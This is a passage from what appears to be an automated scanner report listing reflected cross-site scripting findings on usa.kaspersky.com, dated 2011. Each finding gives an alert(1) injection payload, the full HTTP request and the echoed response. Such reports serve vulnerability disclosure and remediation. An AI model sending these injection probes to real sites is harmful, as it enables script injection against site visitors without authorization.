Path:   /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7280"-alert(1)-"b7b015de7b6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.cssf7280"-alert(1)-"b7b015de7b6?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:37:15 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387835"
Content-Type: text/html; charset=utf-8
Content-Length: 39440
Date: Sun, 23 Oct 2011 16:37:20 GMT
X-Varnish: 1652569976
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
ageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.cssf7280"-alert(1)-"b7b015de7b6?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.82. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 800d7"><script>alert(1)</script>ef5d161670b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css800d7"><script>alert(1)</script>ef5d161670b?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:37:00 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387820"
Content-Type: text/html; charset=utf-8
Content-Length: 38037
Date: Sun, 23 Oct 2011 16:37:07 GMT
X-Varnish: 1652569260
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css800d7"><script>alert(1)</script>ef5d161670b?3" />
...[SNIP]...

1.83. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/img/green-bullet-point.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/img/green-bullet-point.jpg

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf7ac"-alert(1)-"285b88d6f01 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/usa.kaspersky.com/files/img/green-bullet-point.jpgcf7ac"-alert(1)-"285b88d6f01 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:35:45 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387745"
Content-Type: text/html; charset=utf-8
Content-Length: 41026
Date: Sun, 23 Oct 2011 16:35:53 GMT
X-Varnish: 1652565593
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
rop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/img/green-bullet-point.jpgcf7ac"-alert(1)-"285b88d6f01";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.84. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/img/green-bullet-point.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/img/green-bullet-point.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c0e3"><script>alert(1)</script>df5dba6076a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/img/green-bullet-point.jpg7c0e3"><script>alert(1)</script>df5dba6076a HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:35:13 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387713"
Content-Type: text/html; charset=utf-8
Content-Length: 40408
Date: Sun, 23 Oct 2011 16:35:30 GMT
X-Varnish: 1652563502
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/img/green-bullet-point.jpg7c0e3"><script>alert(1)</script>df5dba6076a" />
...[SNIP]...

1.85. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/img/green-bullet-point.jpg [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/img/green-bullet-point.jpg

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6168"-alert(1)-"44c4aeb050b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/usa.kaspersky.com/files/img/green-bullet-point.jpg?d6168"-alert(1)-"44c4aeb050b=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:34:01 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387641"
Content-Type: text/html; charset=utf-8
Content-Length: 29792
Date: Sun, 23 Oct 2011 16:34:08 GMT
X-Varnish: 1652559027
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
op4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/img/green-bullet-point.jpg?d6168"-alert(1)-"44c4aeb050b=1";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.86. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/img/green-bullet-point.jpg [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/img/green-bullet-point.jpg

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a258c"><script>alert(1)</script>2a58982bd91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/img/green-bullet-point.jpg?a258c"><script>alert(1)</script>2a58982bd91=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:31:51 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387511"
Content-Type: text/html; charset=utf-8
Content-Length: 29872
Date: Sun, 23 Oct 2011 16:32:14 GMT
X-Varnish: 1652552526
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/img/green-bullet-point.jpg?a258c"><script>alert(1)</script>2a58982bd91=1" />
...[SNIP]...

1.87. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/js_injector_52.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9340"-alert(1)-"2434f14f008 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitese9340"-alert(1)-"2434f14f008/usa.kaspersky.com/files/js_injector_52.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:28:20 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387300"
Content-Type: text/html; charset=utf-8
Content-Length: 30903
Date: Sun, 23 Oct 2011 16:28:26 GMT
X-Varnish: 1652542783
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sitese9340"-alert(1)-"2434f14f008/usa.kaspersky.com/files/js_injector_52.js?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.88. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/js_injector_52.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cf5b"><script>alert(1)</script>759f481bd19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites9cf5b"><script>alert(1)</script>759f481bd19/usa.kaspersky.com/files/js_injector_52.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:27:39 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387259"
Content-Type: text/html; charset=utf-8
Content-Length: 31000
Date: Sun, 23 Oct 2011 16:27:45 GMT
X-Varnish: 1652540334
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites9cf5b"><script>alert(1)</script>759f481bd19/usa.kaspersky.com/files/js_injector_52.js?3" />
...[SNIP]...

1.89. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/js_injector_52.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3125a"-alert(1)-"38d2c89a96e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/usa.kaspersky.com3125a"-alert(1)-"38d2c89a96e/files/js_injector_52.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:29:43 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387383"
Content-Type: text/html; charset=utf-8
Content-Length: 30903
Date: Sun, 23 Oct 2011 16:29:46 GMT
X-Varnish: 1652547504
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
" Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com3125a"-alert(1)-"38d2c89a96e/files/js_injector_52.js?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.90. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/js_injector_52.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c91b"><script>alert(1)</script>6c1e48cdfe9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com7c91b"><script>alert(1)</script>6c1e48cdfe9/files/js_injector_52.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:29:12 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387352"
Content-Type: text/html; charset=utf-8
Content-Length: 31000
Date: Sun, 23 Oct 2011 16:29:14 GMT
X-Varnish: 1652545840
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com7c91b"><script>alert(1)</script>6c1e48cdfe9/files/js_injector_52.js?3" />
...[SNIP]...

1.91. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/js_injector_52.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f309"-alert(1)-"413e5b99097 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/usa.kaspersky.com/files4f309"-alert(1)-"413e5b99097/js_injector_52.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:31:46 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387506"
Content-Type: text/html; charset=utf-8
Content-Length: 30903
Date: Sun, 23 Oct 2011 16:33:09 GMT
X-Varnish: 1652552375
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
nk You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files4f309"-alert(1)-"413e5b99097/js_injector_52.js?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.92. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/js_injector_52.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8019"><script>alert(1)</script>b0d04f8108c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/filesb8019"><script>alert(1)</script>b0d04f8108c/js_injector_52.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:30:24 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387424"
Content-Type: text/html; charset=utf-8
Content-Length: 31000
Date: Sun, 23 Oct 2011 16:30:39 GMT
X-Varnish: 1652549108
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/filesb8019"><script>alert(1)</script>b0d04f8108c/js_injector_52.js?3" />
...[SNIP]...

1.93. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/js_injector_52.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64217"-alert(1)-"8ecc3cd7366 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

